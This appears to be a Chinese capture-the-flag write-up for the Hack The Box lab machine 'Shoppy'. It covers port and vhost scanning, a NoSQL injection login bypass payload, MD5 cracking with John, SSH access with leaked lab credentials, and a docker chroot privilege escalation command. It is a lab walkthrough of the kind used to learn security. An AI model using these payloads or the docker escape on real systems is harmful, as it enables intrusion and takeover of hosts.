banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

htb靶场-Shoppy

image

ip:10.10.11.180

信息收集#

端口开放情况#

利用nmap进行端口扫描

nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.180

发现的端口:22,80,9093

image

80 跳转到http://shoppy.htb

修改 hosts 文件,添加解析

image

访问http://shoppy.htb/,首页如下:

image

域名情况#

既然有域名,就看看虚拟主机扫描能扫出什么东西。

gobuster vhost -u shoppy.htb -w /Users/grayash/pentesting/web-basic/p12-字典收集/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 50

image

找到一个虚拟主机子域

mattermost.shoppy.htb

mattermost.shoppy.htb添加到 hosts 文件中解析。

浏览器访问后,界面如下:

image

利用ffuf对 shoppy.htb 进行敏感目录及文件遍历。

.\ffuf.exe -w .\fuzz1.txt -u http://shoppy.htb/FUZZ

image

简单测试了下,这个登录框无 POST 链接。

当输入 admin' or '1'='1 程序会无响应,输入 admin' || '1=1 可以绕过后台登录,这个语句是 Nosql 的语句,所以这是一个 [[Nosql 注入]] 登录绕过。

image

在搜索框中输入同样的 payload:admin' || '1=1

image

查看 json 文件,内容如下,包括了账号密码,密码是 md5 加密了。

image

利用 [[john]] 破解 hash

john --wordlist=rockyou.txt --format=Raw-MD5  passwd.txt

image

remembermethisway

利用爆破出的密码登录 mattermost.shoppy.htb

账号密码为:

josh:remembermethisway

mattermost.shoppy.htb 网站是一个聊天程序,后台建立了很多个频道,在一个频道中找到了账号密码,通过分析应该是 10.10.11.180 服务器的密码,尝试 ssh 登录。

image

username: jaeger 
password: Sh0ppyBest@pp!

image

找到第一个 flag,user.txt。

通过 sudo -l 可以查看当前用户可以以 root 身份运行的程序。

image

/home/deploy/password-manager

image

Welcome to Josh password manager!Please enter your master password: SampleAccess granted! Here is creds !cat /home/deploy/creds.txtAccess denied! This incident will be reported !

SampleAccess granted! 所以 Sample 是主密码,通过这个程序就可以看到主密码。

就找到了 deploy 的密码。

image

username: deploy
password: Deploying@pp!

同样的方式,ssh 登录 deploy 账号。

image

权限提升#

通过频道的聊天记录可以知道,服务器是 docker 部署的。

image

通过https://gtfobins.github.io/gtfobins/docker/ 网站找到 docker 权限提升的 payload,通过 docker 可以获取一个交互式 shell。

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

运行后就是 root 权限。

image

获取 /root 目录下的 flag。

知识点#

  • 信息收集能力
  • 虚拟主机、md5 密码破解的能力
  • 权限提升能力

参考#

加载中...
此文章数据所有权由区块链加密技术和智能合约保障仅归创作者所有。